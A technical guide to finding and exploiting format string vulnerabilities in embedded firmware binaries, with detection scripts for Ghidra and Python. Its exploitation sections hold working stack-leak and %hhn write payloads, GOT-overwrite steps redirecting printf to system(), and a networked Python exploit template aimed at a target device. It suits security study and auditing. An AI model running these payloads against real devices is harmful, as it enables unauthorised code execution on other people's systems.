Format string vulnerability detection and exploitation in embedded firmware binaries, covering ARM, MIPS, and x86 architectures
Format String Vulnerability Analysis
Overview
Format string vulnerabilities occur when user-controlled input is passed directly as the format argument to printf-family functions. In embedded systems, these are especially dangerous due to the typical absence of ASLR, stack canaries, and other mitigations.
Dangerous Function Identification
Target Functions
| Function | Library | Risk Level |
|---|---|---|
| `printf(user_input)` | libc | Critical |
| `fprintf(fp, user_input)` | libc | Critical |
| `sprintf(buf, user_input)` | libc | Critical |
| `snprintf(buf, n, user_input)` | libc | Critical |
| `syslog(priority, user_input)` | libc | Critical |
| `vprintf(user_input, va)` | libc | Critical |
| `dprintf(fd, user_input)` | libc | High |
| `err(eval, user_input)` / `warn(user_input)` | BSD libc | High |
| `setproctitle(user_input)` | BSD | High |
| `custom_log(user_input)` | vendor | High |
Detection via Static Analysis
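# Inventory the format-like string literals in the binary.
# Literal format strings are normal; the list helps tell them apart from
# printf-family calls whose format argument is not a literal.
# -t x prints each string's file offset in hex so it can be located in a disassembler:
strings -t x firmware_binary | grep '%s\|%x\|%n\|%p\|%d'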
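The same inventory can be approximated in Python when binutils is not available on the analysis host. This is a minimal sketch, assuming that runs of four or more printable ASCII bytes count as strings; `find_format_strings` is a hypothetical helper name, and the regular expression covers only the common conversions.

```python
import re

# Runs of 4+ printable ASCII bytes, roughly what `strings` reports by default.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
# Common conversions with optional positional index, flags, width, precision, length.
CONVERSION = re.compile(rb"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l)?[sxXdiupn]")


def find_format_strings(data: bytes):
    """Yield (file_offset, text) for printable runs that contain a conversion."""
    for match in PRINTABLE_RUN.finditer(data):
        if CONVERSION.search(match.group()):
            yield match.start(), match.group().decode("ascii")


# Made-up bytes standing in for a firmware image.
sample = b"\x00\x01login failed for %s\x00plain text here\x00\xff%08x.%n\x00"
for offset, text in find_format_strings(sample):
    print(f"{offset:#010x}  {text}")
```

To scan a real image, pass the bytes read from the file (opened in `"rb"` mode) instead of `sample`. As with `strings`, a hit only says that a format string exists in the binary, not that any call site is vulnerable.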
# In disassembly: look for printf/sprintf calls where the format string
# pointer comes from a register or stack slot rather than a .rodata/.data address
# Ghidra: cross-reference printf-family functions and check the format argument
# If the format argument is on the stack or comes from a function parameter → likely vulnerable
Automated Detection with Ghidra
# Ghidra Python script: list call sites of printf-family functions
# getReferencesTo and getFunctionContaining are provided by the Ghidra script environment
PRINTF_FUNCS = set(["printf", "fprintf", "sprintf", "snprintf", "syslog",
                    "vprintf", "vsprintf", "vsnprintf", "dprintf",
                    "warn", "warnx", "err", "errx"])
fm = currentProgram.getFunctionManager()
for func in fm.getFunctions(True):
    # Exact match on the name (minus leading underscores); a substring test
    # would also flag strerror, perror, and other unrelated functions
    name = func.getName().lower().lstrip("_")
    if name in PRINTF_FUNCS:
        for ref in getReferencesTo(func.getEntryPoint()):
            if not ref.getReferenceType().isCall():
                continue  # skip data references such as GOT/PLT pointers
            caller = getFunctionContaining(ref.getFromAddress())
            if caller:
                # .format() instead of an f-string so the script also runs
                # under Ghidra's Jython 2.7 interpreter
                print("[!] {} called from {} @ {}".format(
                    func.getName(), caller.getName(), ref.getFromAddress()))
                # TODO: Check if format argument is user-controlled
Exploitation Techniques
Information Disclosure
# Read stack values
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
# Direct parameter access (find offset where AAAA appears):
AAAA%1$08x AAAA%2$08x AAAA%3$08x ... AAAA%N$08x
# When output shows 41414141 → offset N is where input lands on stack
# Read arbitrary memory (once offset is known, e.g., N=7):
# Place target address at offset, use %s to dereference
# Emit raw bytes: print() would re-encode bytes >= 0x80 as UTF-8 and corrupt the address
python3 -c "import struct, sys; sys.stdout.buffer.write(struct.pack('<I', 0x080491a0) + b'%7\$s\n')"
Architecture-Specific Stack Layout
ARM (32-bit)
# Arguments 1-4 in R0-R3, remaining on stack
# Format string is typically R0 (printf) or R1 (fprintf/sprintf)
# Stack arguments start at offset where SP points
# Exploitation offset calculation for printf:
# R0 = format string pointer
# R1-R3 = first 3 format arguments (from registers)
# Stack[0], Stack[1], ... = subsequent arguments
# For fprintf/sprintf the format pointer is in R1, so only R2-R3 hold format arguments
# Input buffer offset depends on function prologue
# Typical: input appears at offset 4-12 on stack
MIPS (32-bit)
# Arguments 1-4 in $a0-$a3, remaining on stack
# Format string in $a0
# $a1-$a3 cover first 3 format specifiers
# Stack arguments at SP+16, SP+20, ...
# The o32 calling convention reserves 16 bytes at the top of the caller's
# stack frame as a home area for $a0-$a3
# Stack-passed arguments therefore start at SP+16 rather than SP+0:
# the first 4 words belong to the register arguments
# Note: MIPS has branch delay slots, so gadget selection must account
# for the instruction sitting in the delay slot
x86 (32-bit)
# All arguments on stack, right-to-left push order
# Stack layout on entry to printf (immediately after the call instruction):
# ESP+0: return address
# ESP+4: format string pointer
# ESP+8: arg1 (first %x reads this)
# ESP+12: arg2
# ...
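The three layouts in this section can be summarised as a mapping from a positional index (the `N` in `%N$x`) to the register or stack slot it reads. The sketch below is illustrative only: `arg_location` is a hypothetical helper, it assumes a `printf`-style call with the format pointer as the first argument, 32-bit words, the o32 ABI on MIPS, and offsets relative to the stack pointer on entry to the function.

```python
def arg_location(arch: str, n: int) -> str:
    """Return where positional argument n (as in %n$x) is read from."""
    if n < 1:
        raise ValueError("positional arguments are numbered from 1")
    if arch == "x86":
        # ESP+0 return address, ESP+4 format pointer, ESP+8 first argument
        return f"[ESP+{4 + 4 * n}]"
    if arch == "arm":
        # R0 holds the format pointer; R1-R3 hold arguments 1-3
        return f"R{n}" if n <= 3 else f"[SP+{4 * (n - 4)}]"
    if arch == "mips":
        # $a0 holds the format pointer; stack arguments start at SP+16
        return f"$a{n}" if n <= 3 else f"[SP+{4 * n}]"
    raise ValueError(f"unsupported architecture: {arch}")


for arch in ("x86", "arm", "mips"):
    print(arch, [arg_location(arch, n) for n in range(1, 6)])
```

For functions whose format pointer is not the first argument (for example `fprintf` or `snprintf`), the register entries shift accordingly, so treat the output as a starting point to confirm against the disassembly.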
# Input buffer typically at offset 5-15 words from format string
Write Primitive (%n)
# %n writes number of bytes printed so far to address on stack
# Direct parameter: %N$n writes to address at offset N
# Write arbitrary value strategy:
# 1. Place target address at known stack offset (e.g., offset 7)
# 2. Print exact number of characters needed
# 3. Use %n to write count to target address
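Step 2 is modular arithmetic: `%hhn` stores only the low 8 bits of the running character count, so each padding is the difference between the wanted byte and the current count, modulo 256. The sketch below works through that calculation; `hhn_paddings` is a hypothetical helper name, and it assumes four single-byte writes with nothing printed between them except the padding itself.

```python
def hhn_paddings(value: int, already_printed: int, little_endian: bool = True):
    """Return the padding width needed before each of four %hhn writes.

    value            32-bit value to store, one byte per write
    already_printed  characters output before the first padding directive
    """
    byte_order = "little" if little_endian else "big"
    count = already_printed
    pads = []
    for target in value.to_bytes(4, byte_order):
        pad = (target - count) % 256  # %hhn keeps only the low 8 bits
        pads.append(pad)
        count += pad
    return pads


# 16 characters already printed (four 4-byte addresses), target value 0x41424344
print(hhn_paddings(0x41424344, 16))  # [52, 255, 255, 255]
```

A padding of 0 means the `%Nc` directive should be omitted for that byte, because `%0c` still prints one character.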
# Example: write 0x41424344 to the address at offset 7
# Split into byte writes using %hhn (writes a single byte)
# Little-endian byte order in memory: 0x44, 0x43, 0x42, 0x41
python3 -c "
import struct, sys
addr = 0x080491a0
# Write 4 bytes using %hhn (1 byte at a time)
payload = struct.pack('<I', addr) # byte 0
payload += struct.pack('<I', addr + 1) # byte 1
payload += struct.pack('<I', addr + 2) # byte 2
payload += struct.pack('<I', addr + 3) # byte 3
# Offset 7 for first addr, 8 for second, etc.
# The 4 addresses already account for 16 printed bytes.
# %hhn stores the count modulo 256, so reaching a lower byte value takes +255.
payload += b'%52c%7\$hhn' # count 68 = 0x44 (68-16=52 padding)
payload += b'%255c%8\$hhn' # count 323 = 0x143 → writes 0x43
payload += b'%255c%9\$hhn' # count 578 = 0x242 → writes 0x42
payload += b'%255c%10\$hhn' # count 833 = 0x341 → writes 0x41
# Emit raw bytes: print() would re-encode bytes >= 0x80 as UTF-8
sys.stdout.buffer.write(payload + b'\n')
"
GOT Overwrite (No RELRO)
# Overwrite Global Offset Table entry to redirect function calls
# 1. Identify target function's GOT entry address
# 2. Use format string %n to write shellcode address / system() address
# In embedded Linux with no ASLR:
# objdump -R binary | grep printf → GOT entry for printf
# Overwrite printf@GOT → system@plt
# Next printf(user_input) call becomes system(user_input)
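The `objdump -R` lookup can be scripted so that GOT slot addresses are collected in one pass. The sketch below parses the text that `objdump -R` prints and keeps the jump-slot relocations; `parse_got_slots` is a hypothetical helper, and the sample text uses made-up addresses purely to show the expected shape of the input.

```python
import re

# One relocation record: hex offset, relocation type, symbol name.
RELOC_LINE = re.compile(r"^([0-9a-fA-F]+)\s+(R_\w+)\s+(\S+)")


def parse_got_slots(objdump_output: str) -> dict:
    """Map symbol name to GOT slot address for jump-slot relocations."""
    slots = {}
    for line in objdump_output.splitlines():
        match = RELOC_LINE.match(line.strip())
        # "JUMP_SLO" also covers type names that objdump truncates
        if match and "JUMP_SLO" in match.group(2):
            symbol = match.group(3).split("@")[0]  # drop any @VERSION suffix
            slots[symbol] = int(match.group(1), 16)
    return slots


# Illustrative input only; the addresses are invented.
SAMPLE = """\
DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a00c R_386_JUMP_SLOT   printf@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   system@GLIBC_2.0
"""

for name, address in parse_got_slots(SAMPLE).items():
    print(f"{name}@GOT = {address:#010x}")
```

In practice the input would be the captured output of `objdump -R binary`; binaries that do not use jump-slot relocations will produce an empty result and need manual inspection.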
# Embedded bare-metal:
# Overwrite function pointer in interrupt vector table
# Or overwrite callback function pointer in global config struct
Embedded-Specific Considerations
No ASLR Exploitation
# Many embedded devices ship with ASLR disabled
# → Addresses are fixed and predictable across runs
# → GOT addresses, stack addresses, heap addresses all constant
# → Single exploitation attempt sufficient (no brute force needed)
# Verify ASLR status:
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled (common in embedded)
# 1 = stack, mmap, and vDSO randomized; 2 = heap (brk) randomized as well
Bare-Metal / RTOS Targets
# On bare-metal or RTOS without MMU:
# - No GOT/PLT (statically linked)
# - Target function pointers in RAM:
# - ISR vector table (if in RAM)
# - Callback function pointers in structs
# - Timer callback pointers
# - Network receive handler pointers
# Memory layout is fully predictable from binary analysis
Limited Output Channels
# When printf output goes to:
# - UART only → connect serial to read output
# - Syslog → read /var/log/messages remotely
# - Buffer in memory → extract via other vulnerabilities
# - Nowhere (void context) → blind format string
# Blind format string exploitation:
# 1. Use %n to write without needing output
# 2. Overwrite return address or function pointer
# 3. Redirect execution to attacker-controlled payload
# 4. Confirm success via side channel (timing, network behavior)
PoC Template
#!/usr/bin/env python3
"""Format String Exploit Template for Embedded Target"""
import struct
import socket
TARGET_IP = "192.168.1.1"
TARGET_PORT = 80 # or telnet/custom service port
# Architecture: set pack format
ARCH = "arm" # arm | mips | x86
ENDIAN = "<" # < little-endian, > big-endian
PACK_FMT = f"{ENDIAN}I" # 32-bit word
# Step 1: Find format string offset
def find_offset():
    """Send format strings to discover input offset on stack."""
    for i in range(1, 32):
        payload = f"AAAA%{i}$08x"
        resp = send_payload(payload)
        if "41414141" in resp:
            print(f"[+] Input at offset: {i}")
            return i
    return None
# Step 2: Build write-what-where payload
def build_payload(target_addr: int, value: int, offset: int) -> bytes:
    """Build %hhn payload to write 'value' to 'target_addr'."""
    payload = b""
    # Bytes in the order they sit in target memory, so that byte i lands
    # at target_addr + i on both little- and big-endian targets
    bytes_to_write = list(struct.pack(PACK_FMT, value))
    # Pack 4 target addresses
    # Note: an address containing a 0x00 byte ends the format string early
    for i in range(4):
        payload += struct.pack(PACK_FMT, target_addr + i)
    written = len(payload)
    for i, byte_val in enumerate(bytes_to_write):
        # %hhn stores the character count modulo 256
        pad = (byte_val - written) % 256
        if pad > 0:
            payload += f"%{pad}c".encode()
        # pad == 0: already at the correct count, emit no padding
        payload += f"%{offset + i}$hhn".encode()
        written = byte_val
    return payload
def send_payload(payload):
    """Send payload to target; adapt to the specific protocol."""
    # Adapt this for HTTP, Telnet, custom protocol, etc.
    data = payload.encode("latin1") if isinstance(payload, str) else payload
    with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=5) as s:
        s.sendall(data)
        resp = s.recv(4096)
    return resp.decode(errors='replace')
if __name__ == "__main__":
    offset = find_offset()
    if offset:
        print(f"[+] Building exploit for offset {offset}")
        # Example: overwrite GOT entry
        # payload = build_payload(GOT_ADDR, SYSTEM_ADDR, offset)
        # send_payload(payload)
Detection Checklist
- Static binaries: `strings binary | grep -c '%'`; high count near printf xrefs
- Decompiled code: format argument sourced from function parameter, not string literal
- Network input paths: HTTP headers, SNMP community strings, MQTT topics, syslog messages
- Config file parsers: hostname, SSID, device name fields used in log messages
- Web interface: CGI parameters passed to system logging functions
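The "Decompiled code" item lends itself to a quick text scan over exported decompiler output. The sketch below is a rough heuristic under stated assumptions: `find_suspect_calls` and `split_args` are hypothetical helpers, the input is C-like text, and the scan understands double-quoted string literals but not comments, character literals, or macros, so every hit still needs manual review.

```python
import re

# 0-based position of the format parameter for each function.
FORMAT_ARG_INDEX = {
    "printf": 0, "vprintf": 0,
    "fprintf": 1, "sprintf": 1, "dprintf": 1, "syslog": 1,
    "snprintf": 2,
}
CALL = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")


def split_args(text: str, start: int):
    """Split the argument list that begins right after '(' at index start."""
    args, current, depth, in_string = [], [], 0, False
    i = start
    while i < len(text):
        ch = text[i]
        if in_string:
            current.append(ch)
            if ch == "\\" and i + 1 < len(text):
                i += 1                      # keep the escaped character
                current.append(text[i])
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
            current.append(ch)
        elif ch == ")" and depth == 0:
            args.append("".join(current).strip())
            return args
        elif ch == "," and depth == 0:
            args.append("".join(current).strip())
            current = []
        else:
            depth += (ch == "(") - (ch == ")")  # track nested parentheses
            current.append(ch)
        i += 1
    return args  # unterminated call: return what was parsed


def find_suspect_calls(source: str):
    """Yield (function, format_argument) where the format is not a literal."""
    for match in CALL.finditer(source):
        args = split_args(source, match.end())
        index = FORMAT_ARG_INDEX[match.group(1)]
        if index < len(args) and not args[index].startswith('"'):
            yield match.group(1), args[index]


snippet = 'printf("id=%d\\n", id); syslog(3, hdr); snprintf(b, sizeof(b), fmt);'
print(list(find_suspect_calls(snippet)))
```

The function table covers only part of the target list in this document; vendor logging wrappers can be added to `FORMAT_ARG_INDEX` once their format parameter position is known.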